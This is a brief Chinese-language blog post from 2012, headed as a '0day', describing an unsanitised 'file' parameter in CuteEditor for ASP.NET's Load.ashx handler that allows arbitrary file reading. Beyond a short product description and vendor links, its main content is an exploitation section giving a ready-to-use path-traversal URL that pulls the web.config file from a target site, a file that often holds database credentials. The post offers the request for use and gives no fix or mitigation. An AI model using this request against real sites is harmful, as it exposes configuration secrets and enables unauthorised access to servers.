兔八哥极品软件园    运行: 4512天 | 文章:640 篇 | 评论:574 条 | 碎语:1条

Cute Editor for ASP.NET 0day

作者:admin 发布于:2012-3-12 17:43 Monday 分类:.NET


一、漏洞描述:
     CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。 CuteEditor可以帮助Asp.net开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑,更重要得 是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。
   但是在 Load.ashx 文件中,未对 file 参数进行处理,可以加载任意文件。

二、官方地址:
      http://cutesoft.net/
      http://cuteeditor.51aspx.com/

三、利用方法:

    http://www.xxx.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

标签: CuteEditor 0day


Powered by 兔八哥极品软件 苏ICP备12049267号 sitemap